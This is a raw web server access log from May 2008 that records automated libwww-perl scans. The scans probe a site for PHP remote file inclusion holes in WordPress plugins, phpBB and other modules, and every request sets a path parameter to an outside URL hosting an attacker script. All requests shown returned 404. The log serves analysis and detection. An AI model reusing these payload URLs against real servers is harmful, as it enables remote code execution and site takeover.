91.121.64.29 - - [04/May/2008:12:56:19 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:56:34 -0700] "GET /logs/config.inc.php?path_escape=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:56:34 -0700] "GET /config.inc.php?path_escape=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:56:34 -0700] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:37 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:37 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:37 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:38 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:38 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:56:38 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:56:59 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:12:56:59 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:57:05 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:57:05 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:15 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:15 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:15 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:57:16 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:57:16 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:57:16 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:17 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:20 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:57:20 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:57:27 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:57:27 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:57:28 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:12:57:39 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:12:57:39 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:12:58:17 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:12:58:17 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:51 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:51 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:52 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:53 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:53 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:12:58:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:58:56 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:12:58:57 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:05 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:06 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:06 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:06 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:06 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:59:06 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:59:20 -0700] "GET /logs/access_071216.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:46 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:46 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:54 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:54 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:55 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:12:59:55 -0700] "GET /logs/errors.php?error=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:12:59:55 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:59:55 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:13:00:00 -0700] "GET /errors.php?error=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:13:00:00 -0700] "GET /errors.php?error=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:00:14 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:00:15 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:00:18 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:00:19 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:13:00:40 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:13:00:45 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:13:00:45 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:13:00:45 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:00:45 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:00:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:01:01 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:01:01 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:01:02 -0700] "GET /logs/access_071216.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:01:17 -0700] "GET /logs/access_080201.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:01:17 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:01:17 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:01:21 -0700] "GET /logs/access_071216.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:45 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:45 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:01:49 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:13:01:54 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:01:59 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:01:59 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:01:59 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:00 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:00 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:00 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:13:02:04 -0700] "GET /logs//index2.php?t=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:13:02:05 -0700] "GET //index2.php?t=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:05 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:05 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:05 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:08 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:08 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:08 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:02:15 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:15 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:02:16 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:02:16 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:02:16 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:02:26 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:02:31 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:33 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:33 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:34 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:34 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:34 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:02:34 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:02:39 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
